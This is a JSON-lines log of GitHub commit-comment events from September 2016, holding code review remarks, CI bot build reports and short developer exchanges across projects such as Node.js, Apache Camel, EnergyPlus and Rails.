{"id":"4610296093","type":"CommitCommentEvent","actor":{"login":"nateabele"},"repo":{"name":"amilner42/mea2n-kickstarter"},"payload":{"comment":{"id":19151170,"position":166,"line":167,"path":"frontend/src/app/welcome/welcome.component.ts","commit_id":"8b60622b176e6a3c6f757c24683df10e9c601579","created_at":"2016-09-23T18:54:59Z","updated_at":"2016-09-23T18:54:59Z","body":"You can store the error config whenever, then just do `Object.assign(this, config[errorCode])`."}},"created_at":"2016-09-23T18:54:59Z"}
{"id":"4610297500","type":"CommitCommentEvent","actor":{"login":"eugeneo"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19151173,"position":32,"line":126,"path":"test/inspector/inspector-helper.js","commit_id":"5acbeb0272958cfc2aa51e56c2bfafc6584c6cb5","created_at":"2016-09-23T18:55:15Z","updated_at":"2016-09-23T18:55:15Z","body":"@jasnell I updated https://github.com/nodejs/node/pull/8748 to use Buffer.alloc"}},"created_at":"2016-09-23T18:55:15Z"}
{"id":"4610299411","type":"CommitCommentEvent","actor":{"login":"rlafuente"},"repo":{"name":"centraldedados/datapaka"},"payload":{"comment":{"id":19151179,"position":4,"line":135,"path":"datapaka","commit_id":"56e829d00e20b70c115f786c914649ddc0645538","created_at":"2016-09-23T18:55:40Z","updated_at":"2016-09-23T18:55:40Z","body":"Definitely! Late night oversight and committing without tests does this :p "}},"created_at":"2016-09-23T18:55:40Z"}
{"id":"4610301006","type":"CommitCommentEvent","actor":{"login":"jasnell"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19151182,"position":32,"line":126,"path":"test/inspector/inspector-helper.js","commit_id":"5acbeb0272958cfc2aa51e56c2bfafc6584c6cb5","created_at":"2016-09-23T18:55:57Z","updated_at":"2016-09-23T18:55:57Z","body":"Thank you!"}},"created_at":"2016-09-23T18:55:57Z"}
{"id":"4610302950","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19151189,"position":null,"line":null,"path":null,"commit_id":"d7438d316b68758f07f1971d31d47d04bf710800","created_at":"2016-09-23T18:56:21Z","updated_at":"2016-09-23T18:56:21Z","body":"2782485_HybridModel (sanghlee-lbnl) - x86_64-MacOS-10.9-clang: Tests Failed (1664 of 2236 tests passed, 5 test warnings)\n\n * 30 tests had: AUD diffs.\n * 2 tests had: BND diffs.\n * 1 test had: DXF diffs.\n * 30 tests had: EIO diffs.\n * 11 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 4 tests had: RDD diffs.\n * 2 tests had: SSZ big diffs.\n * 3 tests had: ZSZ big diffs.\n * 27 tests had: ESO small diffs.\n * 23 tests had: Table big diffs.\n * 12 tests had: MTR small diffs.\n * 2 tests had: MTR big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d7438d316b68758f07f1971d31d47d04bf710800-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d7438d316b68758f07f1971d31d47d04bf710800-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-74.42%25-red.svg)</a> \n"}},"created_at":"2016-09-23T18:56:21Z"}
{"id":"4610303865","type":"CommitCommentEvent","actor":{"login":"rlafuente"},"repo":{"name":"centraldedados/datapaka"},"payload":{"comment":{"id":19151191,"position":4,"line":135,"path":"datapaka","commit_id":"56e829d00e20b70c115f786c914649ddc0645538","created_at":"2016-09-23T18:56:33Z","updated_at":"2016-09-23T18:56:33Z","body":"Fixed on 786a90e"}},"created_at":"2016-09-23T18:56:33Z"}
{"id":"4610305053","type":"CommitCommentEvent","actor":{"login":"sirlatrom"},"repo":{"name":"apache/camel"},"payload":{"comment":{"id":19151193,"position":205,"line":277,"path":"components/camel-salesforce/camel-salesforce-component/src/main/java/org/apache/camel/component/salesforce/internal/streaming/SubscriptionHelper.java","commit_id":"7d97e5b5800969b74e805e66a94a6c5323bfeafc","created_at":"2016-09-23T18:56:47Z","updated_at":"2016-09-23T18:56:47Z","body":"So if we get a failed message inside the handshake listener added in `doStart()`, it will call `restartClient()` and we'll get back to here with `restartBackoff` increased? What if the handshake succeeds, but connect fails with `\"400::Authenticated user id does not match the session's user id\"`? Then `client.isHandshook()` will return true, despite `lastError` actually having a value... That error is one we experience when running multiple instances subscribing to the same topics and OAuth2 sessions expiring at the same time as a health check executing that tries to use the expired OAuth2 session."}},"created_at":"2016-09-23T18:56:47Z"}
{"id":"4610307833","type":"CommitCommentEvent","actor":{"login":"electron0zero"},"repo":{"name":"kmanojkumar/Jagrit-Vinit-Jeel-Mansi-Manoj"},"payload":{"comment":{"id":19151202,"position":null,"line":null,"path":null,"commit_id":"cf54c6cedd59178d415bba983cf22b41b835b1b3","created_at":"2016-09-23T18:57:16Z","updated_at":"2016-09-23T18:57:16Z","body":"we appreciate that you liked our document but it's licensed under Apache 2.0\r\nYou must credit us by including our license that you can find [here ](https://github.com/ProjectRecommend/docs/blob/master/LICENSE), also you must license your derived work under Apache 2.0 , find more about licensing [here](http://choosealicense.com/)"}},"created_at":"2016-09-23T18:57:16Z"}
{"id":"4610310678","type":"CommitCommentEvent","actor":{"login":"PrajaktaPurohit"},"repo":{"name":"taco911/musical-fiesta"},"payload":{"comment":{"id":19151212,"position":null,"line":null,"path":null,"commit_id":"eee0d0608182118d4472f05fd631bc16e267d213","created_at":"2016-09-23T18:57:51Z","updated_at":"2016-09-23T18:57:51Z","body":"Delivery Status:\n----------------\n|Verify|\n|:--|\n|<a href='http://192.168.33.66/e/cd/#/organizations/taco911/projects/musical-fiesta/changes/19d47265-68fd-4c47-a759-d6af951e2a62/status/verify', target='_blank'><img src='https://img.shields.io/badge/Unit-Skipped-lightgrey.svg', alt='Unit'></a>|\n|<a href='http://192.168.33.66/e/cd/#/organizations/taco911/projects/musical-fiesta/changes/19d47265-68fd-4c47-a759-d6af951e2a62/status/verify', target='_blank'><img src='https://img.shields.io/badge/Lint-Skipped-lightgrey.svg', alt='Lint'></a>|\n|<a href='http://192.168.33.66/e/cd/#/organizations/taco911/projects/musical-fiesta/changes/19d47265-68fd-4c47-a759-d6af951e2a62/status/verify', target='_blank'><img src='https://img.shields.io/badge/Syntax-Skipped-lightgrey.svg', alt='Syntax'></a>|\n"}},"created_at":"2016-09-23T18:57:51Z"}
{"id":"4610313516","type":"CommitCommentEvent","actor":{"login":"juniorz"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19151222,"position":20,"line":239,"path":"otrv4.md","commit_id":"d188bf58842e839a856f9427f32c6fbbd7748648","created_at":"2016-09-23T18:58:26Z","updated_at":"2016-09-23T18:58:26Z","body":"Also, why are we omitting the `PNs = Ns` on a new ratchet? The header should include the number of messages that were sent in the previous ratchet."}},"created_at":"2016-09-23T18:58:26Z"}
{"id":"4610321169","type":"CommitCommentEvent","actor":{"login":"EllaQuimica"},"repo":{"name":"EllaQuimica/argentinaenpython.com.ar"},"payload":{"comment":{"id":19151238,"position":null,"line":null,"path":null,"commit_id":"6e78987511187dad7a0bd73be588c5deb740d175","created_at":"2016-09-23T19:00:02Z","updated_at":"2016-09-23T19:00:02Z","body":"Actualizo a la versión commit https://github.com/DjangoGirls/tutorial/commit/f11f359bd3b1f044f33e5bd77ff796fc17670f7c\r\n\r\nteniendo en cuenta el diff:\r\ntutorial/en/html$ git diff f11f359bd3b1f044f33e5bd77ff796fc17670f7c ."}},"created_at":"2016-09-23T19:00:02Z"}
{"id":"4610327235","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"mindsensors/PiStorms"},"payload":{"comment":{"id":19151261,"position":null,"line":null,"path":null,"commit_id":"8b96883d8697ddf9e3ad774bc1362e81a134aee5","created_at":"2016-09-23T19:01:14Z","updated_at":"2016-09-23T19:01:14Z","body":"Happy 2<sup>8</sup>'th commit! Code adapted from https://inventwithpython.com/tictactoe.py."}},"created_at":"2016-09-23T19:01:14Z"}
{"id":"4610328513","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.relationfield"},"payload":{"comment":{"id":19151265,"position":null,"line":null,"path":null,"commit_id":"f0d87523457333ca4a2be64f0fa8819ba0b30f26","created_at":"2016-09-23T19:01:29Z","updated_at":"2016-09-23T19:01:29Z","body":"@esteele Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.app.relationfield/12/violations\n```\nplone/app/relationfield/adapter.py:0:1: I001 isort found changes, run it on the file\nplone/app/relationfield/event.py:9:1: C901 'extract_relations' is too complex (13)\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-23T19:01:29Z"}
{"id":"4610332847","type":"CommitCommentEvent","actor":{"login":"tylerstraub"},"repo":{"name":"home-assistant/home-assistant"},"payload":{"comment":{"id":19151274,"position":null,"line":null,"path":null,"commit_id":"9631179126615549d914a7390567275cbba732aa","created_at":"2016-09-23T19:02:23Z","updated_at":"2016-09-23T19:02:23Z","body":"Hi @kellerza, \r\n\r\nI think voluptious maybe have broken input_boolean for me. After last night's rebase I started getting:\r\n\r\n> 16-09-23 11:53:46 homeassistant.bootstrap: Invalid config for [input_boolean]: expected a dictionary for dictionary value "}},"created_at":"2016-09-23T19:02:23Z"}
{"id":"4610334109","type":"CommitCommentEvent","actor":{"login":"floam"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":19151275,"position":27,"line":148,"path":"src/fish.cpp","commit_id":"c2a8de48735a300630ea0a400b38aab08b755195","created_at":"2016-09-23T19:02:39Z","updated_at":"2016-09-23T19:02:39Z","body":"This wasn't true: that's where fish_launcher is - we don't put 'fish' in MacOS as a helper. It's in Resources/base/bin/ in a \"normal\" tree."}},"created_at":"2016-09-23T19:02:39Z"}
{"id":"4610335529","type":"CommitCommentEvent","actor":{"login":"grabbou"},"repo":{"name":"rnpm/rnpm"},"payload":{"comment":{"id":19151278,"position":null,"line":null,"path":null,"commit_id":"1db2a06850f8f727b5c68ab0f3450f140c24ac91","created_at":"2016-09-23T19:02:57Z","updated_at":"2016-09-23T19:02:57Z","body":"Thanks @designorant, I've already shipped it :)"}},"created_at":"2016-09-23T19:02:57Z"}
{"id":"4610345500","type":"CommitCommentEvent","actor":{"login":"linhuorong"},"repo":{"name":"linhuorong/test"},"payload":{"comment":{"id":19151297,"position":null,"line":null,"path":null,"commit_id":"373576ca1e1793d14bab1b22a5eaa655ba4ffccb","created_at":"2016-09-23T19:04:49Z","updated_at":"2016-09-23T19:04:49Z","body":"test coment!"}},"created_at":"2016-09-23T19:04:49Z"}
{"id":"4610346567","type":"CommitCommentEvent","actor":{"login":"designorant"},"repo":{"name":"rnpm/rnpm"},"payload":{"comment":{"id":19151300,"position":null,"line":null,"path":null,"commit_id":"1db2a06850f8f727b5c68ab0f3450f140c24ac91","created_at":"2016-09-23T19:05:02Z","updated_at":"2016-09-23T19:05:02Z","body":"Great, thanks for all your work on RNPM!"}},"created_at":"2016-09-23T19:05:02Z"}
{"id":"4610353308","type":"CommitCommentEvent","actor":{"login":"Spelmyst"},"repo":{"name":"Spelmyst/Hello-World"},"payload":{"comment":{"id":19151314,"position":null,"line":null,"path":null,"commit_id":"16493afd5c658882bba1fcb518bb7b026f48062c","created_at":"2016-09-23T19:06:26Z","updated_at":"2016-09-23T19:06:26Z","body":"Started learning."}},"created_at":"2016-09-23T19:06:26Z"}
{"id":"4610356402","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":19151322,"position":null,"line":null,"path":null,"commit_id":"cb54f75053c6e752dbc18d03809839fa8ea26959","created_at":"2016-09-23T19:07:04Z","updated_at":"2016-09-23T19:07:04Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#PtpUyeUWQdmC4LYVqa2MCw"}},"created_at":"2016-09-23T19:07:04Z"}
{"id":"4610365012","type":"CommitCommentEvent","actor":{"login":"sbcgua"},"repo":{"name":"sbcgua/abapGit"},"payload":{"comment":{"id":19151345,"position":null,"line":null,"path":null,"commit_id":"9ccff2690f6ad1c26f4d0e36510304991d238c3f","created_at":"2016-09-23T19:08:52Z","updated_at":"2016-09-23T19:08:52Z","body":"![image](https://cloud.githubusercontent.com/assets/15635498/18798262/4e880292-81da-11e6-81c7-62fe8888c6ca.png)\r\n"}},"created_at":"2016-09-23T19:08:52Z"}
{"id":"4610365120","type":"CommitCommentEvent","actor":{"login":"CraftSpider"},"repo":{"name":"CraftSpider/TalosBot"},"payload":{"comment":{"id":19151347,"position":null,"line":null,"path":null,"commit_id":"e3a484d57fe5837b12d337f5099e5bf95c9de6e6","created_at":"2016-09-23T19:08:54Z","updated_at":"2016-09-23T19:08:54Z","body":"Finished removing all Xdddd variables, and fixed a PM bug"}},"created_at":"2016-09-23T19:08:54Z"}
{"id":"4610370873","type":"CommitCommentEvent","actor":{"login":"charliewu886"},"repo":{"name":"mochidev/MDAboutController"},"payload":{"comment":{"id":19151360,"position":3,"line":282,"path":"Classes/MDAboutController.m","commit_id":"9373b97425bfcc2a5878918757a1a53ca61f1c62","created_at":"2016-09-23T19:10:09Z","updated_at":"2016-09-23T19:10:09Z","body":"Thanks"}},"created_at":"2016-09-23T19:10:09Z"}
{"id":"4610372132","type":"CommitCommentEvent","actor":{"login":"Bnaya"},"repo":{"name":"OpenBudget/open-budget-api"},"payload":{"comment":{"id":19151364,"position":4,"line":15,"path":".travis.yml","commit_id":"3de3d0a29d97087e80ec832374cfbd372735b36e","created_at":"2016-09-23T19:10:24Z","updated_at":"2016-09-23T19:10:24Z","body":"Why did you remove that?"}},"created_at":"2016-09-23T19:10:24Z"}
{"id":"4610381396","type":"CommitCommentEvent","actor":{"login":"AdSchellevis"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":19151379,"position":20,"line":77,"path":"src/opnsense/mvc/app/controllers/OPNsense/CaptivePortal/forms/dialogZone.xml","commit_id":"0fb1cb1d68f9582b1108ac273f9d786fbadd0253","created_at":"2016-09-23T19:12:23Z","updated_at":"2016-09-23T19:12:23Z","body":"@fichtner thanks, I will fix this right away."}},"created_at":"2016-09-23T19:12:23Z"}
{"id":"4610382802","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19151386,"position":6,"line":21,"path":"libselinux/src/callbacks.c","commit_id":"109cece8014790f9220eaf78e650dddf41d69a8f","created_at":"2016-09-23T19:12:42Z","updated_at":"2016-09-23T19:12:42Z","body":"Done and Done."}},"created_at":"2016-09-23T19:12:42Z"}
{"id":"4610385583","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19151390,"position":6,"line":21,"path":"libselinux/src/callbacks.c","commit_id":"109cece8014790f9220eaf78e650dddf41d69a8f","created_at":"2016-09-23T19:13:18Z","updated_at":"2016-09-23T19:13:18Z","body":"Ill shove that off a separate commit upstream."}},"created_at":"2016-09-23T19:13:18Z"}
{"id":"4610390819","type":"CommitCommentEvent","actor":{"login":"inikolov89"},"repo":{"name":"inikolov89/pebble-routines"},"payload":{"comment":{"id":19151405,"position":null,"line":null,"path":null,"commit_id":"5b943db995dd1a8086191ab740623f693cbf346c","created_at":"2016-09-23T19:14:25Z","updated_at":"2016-09-23T19:14:25Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [test](https://trello.com/c/cGl2YPaz/18-test)"}},"created_at":"2016-09-23T19:14:25Z"}
{"id":"4610392062","type":"CommitCommentEvent","actor":{"login":"connorshea"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":19151410,"position":null,"line":null,"path":null,"commit_id":"a502703c3d2151d4d3b421b29fefdac5ad05df61","created_at":"2016-09-23T19:14:37Z","updated_at":"2016-09-23T19:14:37Z","body":"@rafaelfranca it's a bit late to ask, but would it be acceptable to add a note about the removal of `ConnectionAdapters::Column::TRUE_VALUES` in the Changelog? I realize no one was intended to depend on that, but [apparently we did at GitLab]((https://gitlab.com/gitlab-org/gitlab-ce/blob/640ab3072ff278c052ab0e2a5eaec69d684db753/app/models/service.rb#L167) and that caused a bit of headache. Would have been nice to not have to search as hard to find this commit."}},"created_at":"2016-09-23T19:14:37Z"}
{"id":"4610392354","type":"CommitCommentEvent","actor":{"login":"grabbou"},"repo":{"name":"rnpm/rnpm"},"payload":{"comment":{"id":19151412,"position":null,"line":null,"path":null,"commit_id":"1db2a06850f8f727b5c68ab0f3450f140c24ac91","created_at":"2016-09-23T19:14:43Z","updated_at":"2016-09-23T19:14:43Z","body":"Thank you, I am really glad that it also helped you to faster the linking process :)"}},"created_at":"2016-09-23T19:14:43Z"}
{"id":"4610393243","type":"CommitCommentEvent","actor":{"login":"troyanskiy"},"repo":{"name":"troyanskiy/ng2-resource-rest"},"payload":{"comment":{"id":19151417,"position":null,"line":null,"path":null,"commit_id":"b8c68ed45578bf1aa32941cdddd478b247a85dc1","created_at":"2016-09-23T19:14:55Z","updated_at":"2016-09-23T19:14:55Z","body":"@magnitronus actually I don't know if it related to the issue :)\r\nWe faced build prod errors on our projects.\r\nOne of the reasons why I removed reflect is because it's already shimed in angular2.\r\nAnd the other is that for some reason the project can't be build on Windows10 nor Linux, but on MacOS it was build successfully. So probably it was also related to issue `Unexpected value 'AppComponent' declared by the module 'AppModule' #39`"}},"created_at":"2016-09-23T19:14:55Z"}
{"id":"4610393610","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19151419,"position":11,"line":11,"path":"libselinux/ANDROID_FORK","commit_id":"00114f235534035fb47a9114d6c9b6caebf7dd48","created_at":"2016-09-23T19:14:59Z","updated_at":"2016-09-23T19:14:59Z","body":"Yes! I didn't see that file. I need to move that file here and edit as appropriate."}},"created_at":"2016-09-23T19:14:59Z"}
{"id":"4610394969","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope-http-statistics"},"payload":{"comment":{"id":19151423,"position":110,"line":110,"path":"ebpf-programs/http-responses.c","commit_id":"bc706ab377382e254ee7d4e0c2827b2603635ffb","created_at":"2016-09-23T19:15:17Z","updated_at":"2016-09-23T19:15:17Z","body":"This is a bit cryptic... what about:\r\n```\r\nif (hundreds < '0' || hundreds > '9') {\r\n```\r\n\r\n"}},"created_at":"2016-09-23T19:15:17Z"}
{"id":"4610396323","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope-http-statistics"},"payload":{"comment":{"id":19151428,"position":113,"line":113,"path":"ebpf-programs/http-responses.c","commit_id":"bc706ab377382e254ee7d4e0c2827b2603635ffb","created_at":"2016-09-23T19:15:35Z","updated_at":"2016-09-23T19:15:35Z","body":"ditto `hundreds -= '0';`"}},"created_at":"2016-09-23T19:15:35Z"}
{"id":"4610399311","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19151435,"position":null,"line":null,"path":null,"commit_id":"42394a77ca33c6ca873069614fa0c01cf20a1695","created_at":"2016-09-23T19:16:15Z","updated_at":"2016-09-23T19:16:15Z","body":"129956735-WaterHeaterHeight (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2331 of 2339 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42394a77ca33c6ca873069614fa0c01cf20a1695-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42394a77ca33c6ca873069614fa0c01cf20a1695-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.svg)</a> \n"}},"created_at":"2016-09-23T19:16:15Z"}
{"id":"4610400323","type":"CommitCommentEvent","actor":{"login":"spershin"},"repo":{"name":"facebook/folly"},"payload":{"comment":{"id":19151438,"position":null,"line":null,"path":null,"commit_id":"70618258130b18cae08ecd5e88de518ab38425fd","created_at":"2016-09-23T19:16:28Z","updated_at":"2016-09-23T19:16:28Z","body":"I did:\r\n\r\ngit clone https://github.com/facebook/folly\r\n<build folly with some effort>\r\n\r\nThen:\r\n\r\ngit clone https://github.com/facebook/wangle\r\n<try to build wangle and hit lots of roadblocks, including the mentioned>"}},"created_at":"2016-09-23T19:16:28Z"}
{"id":"4610407862","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope-http-statistics"},"payload":{"comment":{"id":19151459,"position":18,"line":18,"path":"ebpf-programs/http-responses.c","commit_id":"bc706ab377382e254ee7d4e0c2827b2603635ffb","created_at":"2016-09-23T19:18:04Z","updated_at":"2016-09-23T19:18:04Z","body":"As said OOB, shouldn't you use `skb_copy_datagram_from_iter` for the HTTP responses?"}},"created_at":"2016-09-23T19:18:04Z"}
{"id":"4610413682","type":"CommitCommentEvent","actor":{"login":"jpadela48"},"repo":{"name":"ctooker1/ProgrammingAssignment2"},"payload":{"comment":{"id":19151490,"position":null,"line":null,"path":null,"commit_id":"9cd2aef60c743ec7f607e52b0492ab4db0a69442","created_at":"2016-09-23T19:19:18Z","updated_at":"2016-09-23T19:19:18Z","body":"This appears to be similar to my code"}},"created_at":"2016-09-23T19:19:18Z"}
{"id":"4610414519","type":"CommitCommentEvent","actor":{"login":"jpadela48"},"repo":{"name":"ctooker1/ProgrammingAssignment2"},"payload":{"comment":{"id":19151492,"position":null,"line":null,"path":null,"commit_id":"9cd2aef60c743ec7f607e52b0492ab4db0a69442","created_at":"2016-09-23T19:19:29Z","updated_at":"2016-09-23T19:19:29Z","body":"Good job"}},"created_at":"2016-09-23T19:19:29Z"}
{"id":"4610416547","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope-http-statistics"},"payload":{"comment":{"id":19151496,"position":20,"line":136,"path":"ebpf-programs/http-responses.c","commit_id":"9e7f069d0e920da72d44a7e0711b464684588e77","created_at":"2016-09-23T19:19:57Z","updated_at":"2016-09-23T19:19:57Z","body":"`s/http_resposne_codes_t/http_response_codes_t/`\r\n(same typo everywhere)"}},"created_at":"2016-09-23T19:19:57Z"}
{"id":"4610418843","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"sisl/BayesNets.jl"},"payload":{"comment":{"id":19151504,"position":null,"line":null,"path":null,"commit_id":"dfcbf55a9ab7caa02b05175f6ac413646dbee953","created_at":"2016-09-23T19:20:24Z","updated_at":"2016-09-23T19:20:24Z","body":"nevermind, it's an export from LightGraphs and you do `using LightGraphs`, duh"}},"created_at":"2016-09-23T19:20:24Z"}
{"id":"4610419512","type":"CommitCommentEvent","actor":{"login":"montyvesselinov"},"repo":{"name":"madsjulia/Mads.jl"},"payload":{"comment":{"id":19151508,"position":4,"line":25,"path":"REQUIRE","commit_id":"db827c14bbb8b88499c01fd13624bdc848837ad2","created_at":"2016-09-23T19:20:34Z","updated_at":"2016-09-23T19:20:34Z","body":"Done.\nOn Fri, Sep 23, 2016 at 12:36 PM Tony Kelman <notifications@github.com>\nwrote:\n\n> best to declare a minimum version that implements the features you need,\n> here I think it's 0.7.15 for Compat.String\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/madsjulia/Mads.jl/commit/db827c14bbb8b88499c01fd13624bdc848837ad2#commitcomment-19150936>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFXxeCa1f4IC2Fadt3aY-MXiwMRzRrKqks5qtBw0gaJpZM4KFRNS>\n> .\n>\n-- \n-monty\n"}},"created_at":"2016-09-23T19:20:34Z"}
{"id":"4610425100","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope-http-statistics"},"payload":{"comment":{"id":19151524,"position":25,"line":141,"path":"ebpf-programs/http-responses.c","commit_id":"9e7f069d0e920da72d44a7e0711b464684588e77","created_at":"2016-09-23T19:21:44Z","updated_at":"2016-09-23T19:21:44Z","body":"What's the issue with memcpy?\r\n\r\nDoes the following work?\r\n```\r\nnew_codes_counts = current_codes_counts;\r\n```"}},"created_at":"2016-09-23T19:21:44Z"}
{"id":"4610425390","type":"CommitCommentEvent","actor":{"login":"tylerstraub"},"repo":{"name":"home-assistant/home-assistant"},"payload":{"comment":{"id":19151525,"position":null,"line":null,"path":null,"commit_id":"9631179126615549d914a7390567275cbba732aa","created_at":"2016-09-23T19:21:48Z","updated_at":"2016-09-23T19:21:48Z","body":"Confirmed that functionality was restored by rolling back to #3354 (the commit immediately before this one). "}},"created_at":"2016-09-23T19:21:48Z"}
{"id":"4610429176","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"gregarndt/servo"},"payload":{"comment":{"id":19151530,"position":null,"line":null,"path":null,"commit_id":"91200d7c2fed66b96bec480853e7d6298471448e","created_at":"2016-09-23T19:22:37Z","updated_at":"2016-09-23T19:22:37Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#UP7XVwBATWyMmK_kQj7drQ"}},"created_at":"2016-09-23T19:22:37Z"}
{"id":"4610429358","type":"CommitCommentEvent","actor":{"login":"dhirajsb"},"repo":{"name":"apache/camel"},"payload":{"comment":{"id":19151532,"position":205,"line":277,"path":"components/camel-salesforce/camel-salesforce-component/src/main/java/org/apache/camel/component/salesforce/internal/streaming/SubscriptionHelper.java","commit_id":"7d97e5b5800969b74e805e66a94a6c5323bfeafc","created_at":"2016-09-23T19:22:39Z","updated_at":"2016-09-23T19:22:39Z","body":"So when the connect error happens, just after handshake has succeeded and fallen through this check, CometD connect failure retries should kick in. That should ultimately cause another handshake error (sometime after this handshake check) to be handled in the latest handshake listener. So the reconnect attempts should start all over again. \r\nDoes CometD not re-handshake after connect listener gets the 400 error? Are you seeing a different behavior in your testing with this code from what I explained? If so, can you attach a full debug log to the JIRA issue so I can see what's happening?  "}},"created_at":"2016-09-23T19:22:39Z"}
{"id":"4610429969","type":"CommitCommentEvent","actor":{"login":"a-johnston"},"repo":{"name":"davidpendergast/Cool-Python-Platformer"},"payload":{"comment":{"id":19151534,"position":null,"line":null,"path":null,"commit_id":"351773a9bd1dca51d6e72c3aac9a7e59fa70004e","created_at":"2016-09-23T19:22:48Z","updated_at":"2016-09-23T19:22:48Z","body":"I just ran into this awful file a minute or two ago. You realize ```list``` is like sort of reserved in python? It's a built in method to put an iterable into a new list."}},"created_at":"2016-09-23T19:22:48Z"}
{"id":"4610430436","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"mirekmts/JavaScript"},"payload":{"comment":{"id":19151537,"position":2,"line":2,"path":"instrukcje-warunkowe/js/scripts.js","commit_id":"c45ef2337b3dd3214bd2433d8f245e46e7cac073","created_at":"2016-09-23T19:22:54Z","updated_at":"2016-09-23T19:22:54Z","body":"Po `b=2` powienien być przecinek."}},"created_at":"2016-09-23T19:22:54Z"}
{"id":"4610431310","type":"CommitCommentEvent","actor":{"login":"TruDan"},"repo":{"name":"NiclasOlofsson/MiNET"},"payload":{"comment":{"id":19151540,"position":null,"line":null,"path":null,"commit_id":"d1deba35497e7e7926c992fe2f04ba9867470091","created_at":"2016-09-23T19:23:04Z","updated_at":"2016-09-23T19:23:04Z","body":"😍😍"}},"created_at":"2016-09-23T19:23:04Z"}
{"id":"4610433200","type":"CommitCommentEvent","actor":{"login":"sosey"},"repo":{"name":"spacetelescope/hstcal"},"payload":{"comment":{"id":19151542,"position":null,"line":null,"path":null,"commit_id":"cb01dc7bf503bc257c8a4254b129c8ae7c3185f0","created_at":"2016-09-23T19:23:28Z","updated_at":"2016-09-23T19:23:28Z","body":"Not quite. You cannot do a string comparisons like that, you have to first cast to a float and then check if it's greater than a value, or follow the old processes of assigning a string name to the version and then checking for the 64bit releases to add the flag. \r\n\r\nI don't care if the error string is Yellow, or Red, but it should still contain the text that says, hey we aren't taking this version into account. \r\n\r\n"}},"created_at":"2016-09-23T19:23:28Z"}
{"id":"4610434654","type":"CommitCommentEvent","actor":{"login":"randwer"},"repo":{"name":"randwerArbeit/rhinozelfant"},"payload":{"comment":{"id":19151549,"position":null,"line":null,"path":null,"commit_id":"3d65a37880a373773a40b94a152b1cd693e96858","created_at":"2016-09-23T19:23:49Z","updated_at":"2016-09-23T19:23:49Z","body":"*gekapselt"}},"created_at":"2016-09-23T19:23:49Z"}
{"id":"4610440504","type":"CommitCommentEvent","actor":{"login":"ptomin"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":19151563,"position":18,"line":138,"path":"src/Decompiler/Analysis/ExpressionPropagator.cs","commit_id":"1694a64b235994cbf0ee7f055ba6e33e427328e5","created_at":"2016-09-23T19:25:05Z","updated_at":"2016-09-23T19:25:05Z","body":"`ExpressionPropagator` is unused in new ssa, is not it? Should it be removed when `analysis-development` will be merged `master`?\r\n> Should I feed this to the master branch?\r\n\r\nI think, yes"}},"created_at":"2016-09-23T19:25:05Z"}
{"id":"4610440791","type":"CommitCommentEvent","actor":{"login":"EECOLOR"},"repo":{"name":"css-modules/postcss-modules-scope"},"payload":{"comment":{"id":19151564,"position":48,"line":48,"path":"README.md","commit_id":"ae0edba1901e0b046cce38868965e35cc02a2791","created_at":"2016-09-23T19:25:09Z","updated_at":"2016-09-23T19:25:09Z","body":"What am I missing? It seems the part before and after `becomes` is exactly the same."}},"created_at":"2016-09-23T19:25:09Z"}
